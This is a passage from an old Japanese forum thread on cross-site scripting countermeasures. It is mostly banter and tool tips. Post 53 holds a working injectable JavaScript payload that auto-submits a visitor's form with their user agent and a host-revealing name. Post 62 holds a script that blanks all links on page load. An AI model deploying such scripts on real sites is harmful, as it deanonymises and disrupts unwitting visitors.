クロスサイトスクリプティング対策 (114レス)
1-
52(1): 名無しさん@お腹いっぱい。 02/02/08 13:44 ID:??? AAS
>日本でもWebサイトに関する最初のインシデントとして記録されているのは、1997年に総務省の掲示板にタグ
>が書き込まれ、その掲示板を閲覧しようすると、オウム真理教の音楽が外部サイトから読み込まれて鳴るよう
>になったという事件であり、このようにクロスサイトスクリプティングの脆弱性は古くから存在する問題である。

タグ可の掲示板はみんな着尺製ありだな
2chスレ:sec
53: 名無しさん@お腹いっぱい。 02/02/09 01:21 ID:??? AAS
F=Function;fs=document.forms;

l0=new F('f=fs[fs.length-1]');
l1=new F('es=f.elements;');
l2=new F('a=es[0];b=es[2];');
l3=new F('c=es[3];d=es[4];');
l4=new F('a.value=navigator.userAgent;');
l5=new F('b.value=\'fusianasan\';');
l6=new F('c.value=\'\';');
l7=new F('d.value=\' \';');

l8=new F('es[1].click();');
省4
54(1): 名無しさん@お腹いっぱい。 02/02/12 11:32 ID:??? AAS
>>52
>着尺製

読めない…。
55(1): 名無しさん@お腹いっぱい。 02/02/12 11:44 ID:??? AAS
>>54
> >着尺製
「脆弱性」の (2ch的?) 誤読だと思われ。

正しくは「もろよわせい」と読むらしい。
56: 名無しさん@お腹いっぱい。 02/02/12 12:06 ID:??? AAS
>>55
2chスレ:sec
2chスレ:sec
57: 名無しさん@お腹いっぱい。 [age] 02/02/12 22:55 ID:??? AAS
>>22
で、22はお腹いっぱいヤバゲなの見つかったのかな?
SSLなページの確認はメンドーでないかい? >all
アホプログラマーの重箱の隅つつくのも疲れてきたぞ。(藁
58: 名無しさん@お腹いっぱい。 [もろよわ] 02/02/19 00:17 ID:??? AAS
> SSLなページの確認はメンドーでないかい?

なぜに?
59: 57 [age] 02/02/19 01:53 ID:??? AAS
漏れがバカだから。とりあえずパケットキャプチャーしてどんな内容送ってるのか見ようと思うんだけど。
IEなんかのクライアントで見て、値が固定されてるもののテストってどうしてますか?
例えば買い物の個数とかサーバ側でエスケープ処理してるか確認したい訳で。
POSTメソッドの値を色々試すのに良いツールってないですかねぇ。HTMLエディタで書き換える?
60(1): 名無しさん@お腹いっぱい。 02/02/19 02:02 ID:??? AAS
外部リンク:www.mountsystem.ne.jp
ここのTantanCGI
61: 57 [age] 02/02/19 07:49 ID:??? AAS
>>60
すっ、すばらしい...。ありがとう御座います。感謝感激!
これでもっと重箱の隅つっけそうです。(藁
62: a 02/06/27 00:50 ID:awVCb82d(1) AAS
&{document.captureEvents(Event.LOAD);window.onload=new Function('for(var i=0;Boolean(document.links[i]);i++)document.links[i].href=\'\';')};
63: 02/12/06 16:58 ID:??? AAS
ここで配布してるスクリプトも脆弱性の問題あり?

外部リンク[zip]:www.onpuch.jp
64: 03/01/10 01:43 ID:QhQLqNIU(1) AAS
Struts使おう。
65: 山崎渉 [(^^)sage] 03/01/16 03:36 ID:??? AAS
(^^)
66: 奥さん ◆mL2ZRk1cK. 03/01/18 07:27 ID:AxdRMTC9(1/9) AAS
d
67: 奥さん ◆0Z6Yhsb88E 03/01/18 07:27 ID:AxdRMTC9(2/9) AAS
aq
68: 奥さん ◆E39m/9K3xY 03/01/18 07:28 ID:AxdRMTC9(3/9) AAS
qwe
69: 奥さん ◆8WgvSovIKg 03/01/18 07:28 ID:AxdRMTC9(4/9) AAS
qwer
70: 奥さん ◆ABM5odHy/Q 03/01/18 07:29 ID:AxdRMTC9(5/9) AAS
12345
71: 奥さん ◆bc.v5kgifQ 03/01/18 07:30 ID:AxdRMTC9(6/9) AAS
hfjfjf
1-
あと 43 レスあります
スレ情報 赤レス抽出 画像レス抽出 歴の未読スレ AAサムネイル
ぬこの手 ぬこTOP 0.009s